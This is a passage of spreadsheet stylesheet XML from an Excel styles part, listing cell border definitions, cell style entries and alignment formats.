      <bottom style="medium">
        <color indexed="64"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">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ck">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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ck">
        <color auto="1"/>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thick">
        <color auto="1"/>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hair">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="hair">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color auto="1"/>
      </left>
      <right style="hair">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="hair">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hair">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <right style="hair">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hair">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">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rgb="FF000000"/>
      </left>
      <right/>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>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bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>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top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color rgb="FF000000"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>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thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>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ck">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">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diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top/>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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medium">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color rgb="FFFF0000"/>
      </left>
      <right style="thick">
        <color rgb="FFFF0000"/>
      </right>
      <top style="thick">
        <color rgb="FFFF0000"/>
      </top>
      <bottom style="thick">
        <color rgb="FFFF0000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FFFF0000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="hair">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">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thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="hair">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auto="1"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="medium">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thick">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thick">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top style="medium">
        <color auto="1"/>
      </top>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style="thick">
        <color auto="1"/>
      </left>
      <right/>
      <top style="medium">
        <color indexed="64"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thick">
        <color auto="1"/>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ck">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="medium">
        <color indexed="64"/>
      </right>
      <top style="thick">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ck">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ck">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thick">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="7">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="60" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="811">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="5"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left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="5" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="5" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="5" fillId="4" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="3"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="26" xfId="3" applyBorder="1"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="3" applyFont="1"/>
    <xf numFmtId="1" fontId="5" fillId="9" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="5" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="12" fillId="5" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="12" fillId="5" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="19" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="21" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="22" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="10" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="10" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="23" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="29" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="24" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="24" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="25" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="9" fillId="9" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="11" fillId="9" borderId="27" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="2" borderId="46" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="2" borderId="45" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="2" borderId="46" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="60" fillId="0" borderId="0" xfId="4" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="44" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="41" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="78" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="30" borderId="79" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="30" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="30" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="30" borderId="81" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="31" borderId="82" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="31" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="31" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="31" borderId="81" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="32" borderId="82" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="32" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="32" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="32" borderId="83" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="33" borderId="84" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="33" borderId="80" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
